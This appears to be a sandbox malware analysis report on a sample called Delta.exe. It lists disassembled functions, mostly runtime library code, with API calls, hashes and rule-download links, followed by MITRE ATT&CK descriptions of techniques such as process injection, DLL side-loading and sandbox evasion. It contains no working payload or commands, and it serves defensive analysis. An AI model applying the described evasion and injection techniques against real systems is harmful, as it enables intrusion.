Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ad31e734313e7a9249cac7ad8c6a5eef9bccd0350ba930262443024763d1882
Instruction ID: c2fa8e955e28bbee1fd9e6bb43a9e3f773a07c072df105720d3ec89f929f0797
Opcode Fuzzy Hash: 6ad31e734313e7a9249cac7ad8c6a5eef9bccd0350ba930262443024763d1882
Instruction Fuzzy Hash: 40B12470A4425AAFDB09DF98C854BFFBBBABF49301F144188E5019B3D2C7709A42CB64

Function 005F446D Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,005F4464,005EA97D,005E9BD4), ref: 005F447B
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005F4489
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005F44A2
SetLastError.KERNEL32(00000000,005F4464,005EA97D,005E9BD4), ref: 005F44F4

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0d596911b59a9c047910c23468b3d5e36a4a7e61d0bc7b61805c63a7a278ff42
Instruction ID: 74bde17e953e65bb42660ce8308490383e767382793504e121a66b076526158d
Opcode Fuzzy Hash: 0d596911b59a9c047910c23468b3d5e36a4a7e61d0bc7b61805c63a7a278ff42
Instruction Fuzzy Hash: 0001F53210921A5DFF242774BC8DA7B2F95FB81774B24562AF710A54F1EF594C415680

Function 005EF1F8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,843561DF,?,?,00000000,00605684,000000FF,?,005EF2B9,005EF1A0,?,005EF355,00000000), ref: 005EF22D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005EF23F
FreeLibrary.KERNEL32(00000000,?,?,00000000,00605684,000000FF,?,005EF2B9,005EF1A0,?,005EF355,00000000), ref: 005EF261

Strings

mscoree.dll, xrefs: 005EF226
CorExitProcess, xrefs: 005EF237

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9923212948d01b4b10cc4d8a39d531265136050e66f0b67739d21bf28971f330
Instruction ID: 0d19ee2146e0fdf68ab9bd2fbd3958334147df7311f1c8c1f1d2bd18c3cc7b11
Opcode Fuzzy Hash: 9923212948d01b4b10cc4d8a39d531265136050e66f0b67739d21bf28971f330
Instruction Fuzzy Hash: 0C01A735990665AFDB058B50DC09BAF7BBAFB04B11F054625F911A22D0DBB59900CB80

Function 005E77F2 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005E77F9
std::_Lockit::_Lockit.LIBCPMT ref: 005E7804
std::_Lockit::~_Lockit.LIBCPMT ref: 005E7872

Part of subcall function 005E76EF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 005E7707

std::locale::_Setgloballocale.LIBCPMT ref: 005E781F
_Yarn.LIBCPMT ref: 005E7835

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 73559966a19406a96356916272aa543b2ad16e8b47ddd21919bbdaab389b301d
Instruction ID: 127051f0acf59492f958e44fb61ded7945e80b521dec705d460c572fcbb05007
Opcode Fuzzy Hash: 73559966a19406a96356916272aa543b2ad16e8b47ddd21919bbdaab389b301d
Instruction Fuzzy Hash: FA01B1B5A445659BCB0DEF21D8595BD7F63FFD9340B08400AE94257391DF345E02CB91

Function 005FF6B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,005FF74C,00000000,?,00611E20,?,?,?,005FF683,00000004,InitializeCriticalSectionEx,006090D4,006090DC), ref: 005FF6BD
GetLastError.KERNEL32(?,005FF74C,00000000,?,00611E20,?,?,?,005FF683,00000004,InitializeCriticalSectionEx,006090D4,006090DC,00000000,?,005F539C), ref: 005FF6C7
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 005FF6EF

Strings

api-ms-, xrefs: 005FF6D4

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 9458986fe14a6397e8bd588a29570af377867a1acb15919e2e470f5876aba73e
Instruction ID: 17dcdea6805f37455ae7a3c6c090ebe7025b4a4e1a35e004e175c42ba4028e9b
Opcode Fuzzy Hash: 9458986fe14a6397e8bd588a29570af377867a1acb15919e2e470f5876aba73e
Instruction Fuzzy Hash: FBE012302C0209B6EB201B60DC0AB693E59AF00B90F244430FA0CE44F0EFA799509684

Function 005FD74E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(843561DF,00000000,00000000,?), ref: 005FD7B1

Part of subcall function 005F5801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005F6FD5,?,00000000,-00000008), ref: 005F5862

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005FDA03
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 005FDA49
GetLastError.KERNEL32 ref: 005FDAEC

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 6cf0c52d3e73f08fcc0ed1aeb5713de87f39ae0844585a1f9f0ccf958d64b0df
Instruction ID: 11cee9baf538e2cc5ce4bb32fa1fc46e1a1ebfec583e0348e2ad5c08e0a20285
Opcode Fuzzy Hash: 6cf0c52d3e73f08fcc0ed1aeb5713de87f39ae0844585a1f9f0ccf958d64b0df
Instruction Fuzzy Hash: D2D19AB5D042499FCF15CFA8C880AEDBFB6FF48300F28456AE656EB351D634A941CB64

Function 005F4A73 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 005F4B3A
___AdjustPointer.LIBCMT ref: 005F4B5D
___AdjustPointer.LIBCMT ref: 005F4BF9

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 964bdf51fb866233385926e2dc07fa998035440be73ce649b23c557ff8bf0d04
Instruction ID: e5afe5a909e1708bece98ad2b67a295fdd7718b937fa8ab0a1fa2eab2db965e2
Opcode Fuzzy Hash: 964bdf51fb866233385926e2dc07fa998035440be73ce649b23c557ff8bf0d04
Instruction Fuzzy Hash: CC51BD7260420A9FDB298F15D885BBBBFA5FF40311F144929EA558B292E739EC40CF90

Function 005FB576 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 005F5801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005F6FD5,?,00000000,-00000008), ref: 005F5862

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 005FB5DA
__dosmaperr.LIBCMT ref: 005FB5E1
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 005FB61B
__dosmaperr.LIBCMT ref: 005FB622

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 22fa6a46dbdf54d7afc27e740296dac6c9c854c5910d26f5f90b73d19b92c6f7
Instruction ID: c49f72e525347cdccc3fae3c8e0b98b68a230e39773173121f91d30e833e33c0
Opcode Fuzzy Hash: 22fa6a46dbdf54d7afc27e740296dac6c9c854c5910d26f5f90b73d19b92c6f7
Instruction Fuzzy Hash: 1121C87164060EEFEB10AF65C88487BBFA9FF403647148918FA15D7250E739EC408B60

Function 005ECA12 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3066158a8f3f63875ddf91f6868d335d9d5c417abe0e7caa3acc9d89fe2aae7
Instruction ID: ea89dab92a0afd5ef0a8adf09d3978342be73db379b71aea8f7b963b23b921ed
Opcode Fuzzy Hash: a3066158a8f3f63875ddf91f6868d335d9d5c417abe0e7caa3acc9d89fe2aae7
Instruction Fuzzy Hash: 2C21017220024EAFDB28EF66CC4596B7FA8FF803287148824F995C7140E730EC428760

Function 005FC96E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 005FC976

Part of subcall function 005F5801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005F6FD5,?,00000000,-00000008), ref: 005F5862

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005FC9AE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005FC9CE

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 0898260b110ecf406231476a45f7e649cb8978464c3357de7f0a4eff3ec9c868
Instruction ID: fb9afcdc214f69860afa9e41db91e9ed0a2b7e03c35a873c064322beb9e3a779
Opcode Fuzzy Hash: 0898260b110ecf406231476a45f7e649cb8978464c3357de7f0a4eff3ec9c868
Instruction Fuzzy Hash: F911C0F2901A1E7FA71167B65E8DC7FAE9CFE853E43100825FB42E2101FA69ED0185B0

Function 00604490 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,006039DF,00000000,00000001,?,?,?,005FDB40,?,00000000,00000000), ref: 006044A7
GetLastError.KERNEL32(?,006039DF,00000000,00000001,?,?,?,005FDB40,?,00000000,00000000,?,?,?,005FD486,?), ref: 006044B3

Part of subcall function 00604510: CloseHandle.KERNEL32(FFFFFFFE,006044C3,?,006039DF,00000000,00000001,?,?,?,005FDB40,?,00000000,00000000,?,?), ref: 00604520

___initconout.LIBCMT ref: 006044C3

Part of subcall function 006044E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00604481,006039CC,?,?,005FDB40,?,00000000,00000000,?), ref: 006044F8

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,006039DF,00000000,00000001,?,?,?,005FDB40,?,00000000,00000000,?), ref: 006044D8

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 6da3842649e4d8930f741f9357833d346d537ee241559651f353b606306c7cef
Instruction ID: 3dfad016b6d35c8fa859c5afee4e6fe09de3ac19568723d64df7b14aa43bda4f
Opcode Fuzzy Hash: 6da3842649e4d8930f741f9357833d346d537ee241559651f353b606306c7cef
Instruction Fuzzy Hash: 59F03036081124BBCF765FD6EC48ACB3F67FB493A0B058410FB1885170DA3289609B94

Function 005FA126 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,005EF809,?,?,?,00000055,?,-00000050,?,?,?), ref: 005FA1E5
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,005EF809,?,?,?,00000055,?,-00000050,?,?), ref: 005FA21C

Strings

utf8, xrefs: 005FA2EE

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: e0a839c5e40fc195548519b154c33770e3712c7a7ebbb924fc40b28284a436b2
Instruction ID: 7c72d6a4e435789be67bb092f3d7442a98be850430571e2303c5ea0cfb779f7e
Opcode Fuzzy Hash: e0a839c5e40fc195548519b154c33770e3712c7a7ebbb924fc40b28284a436b2
Instruction Fuzzy Hash: 8A51D5B1A0070EAAE725AB70CC46FB67BA9BF44700F154829E74D970C2E778E940C663

Function 005F5170 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,005F5071,?,?,00000000,00000000,00000000,?), ref: 005F5195

Strings

RCC, xrefs: 005F51AF
MOC, xrefs: 005F51A7

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 40665c04f800be231fb798318d72fdd8da67c94ebfb821d6d117f48cb7fdc5c6
Instruction ID: b6df5fbc624bbd1e432896dc878d28111ec64253e656771351f9964f64d1e311
Opcode Fuzzy Hash: 40665c04f800be231fb798318d72fdd8da67c94ebfb821d6d117f48cb7fdc5c6
Instruction Fuzzy Hash: 3E41887590060DAFCF15CF94CD85AAEBFB5FF48300F188259FB08A6212E339A950DB51

Function 005F49DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 005F4C53

Strings

csm, xrefs: 005F4CE6
csm, xrefs: 005F4C75

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: b0089d0a38f5e6b817c3f2ea62f4766f2ee95a21c95e128898fbd2dac5879dd4
Instruction ID: ec501d61f067b68109984557efce041eedb3553d65fb43f4b3a7c351872468ca
Opcode Fuzzy Hash: b0089d0a38f5e6b817c3f2ea62f4766f2ee95a21c95e128898fbd2dac5879dd4
Instruction Fuzzy Hash: 7331CC3250121DABCF269F54CC049BB7F66FF48315B19865AFA548E221C33ACCA1DF81

Analysis Process: Delta.exePID: 7396, Parent PID: 7332COMMON

Non-executed Functions

Function 02C3FA4A Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Associated: 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2c30000_Delta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a502a3d4acbe2eab7fb8ba42e692865dc48fa7bf80e7f44912651fa3bf0bc598
Instruction ID: 451586feafbc2f9418bc682b32eb8818dc7fe928e697b82f2ea99de8301abb4f
Opcode Fuzzy Hash: a502a3d4acbe2eab7fb8ba42e692865dc48fa7bf80e7f44912651fa3bf0bc598
Instruction Fuzzy Hash: CAA022C30000802AE3E30308C83B2823FE0BCC233830E08C082000BB33F0E08002C2C8

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
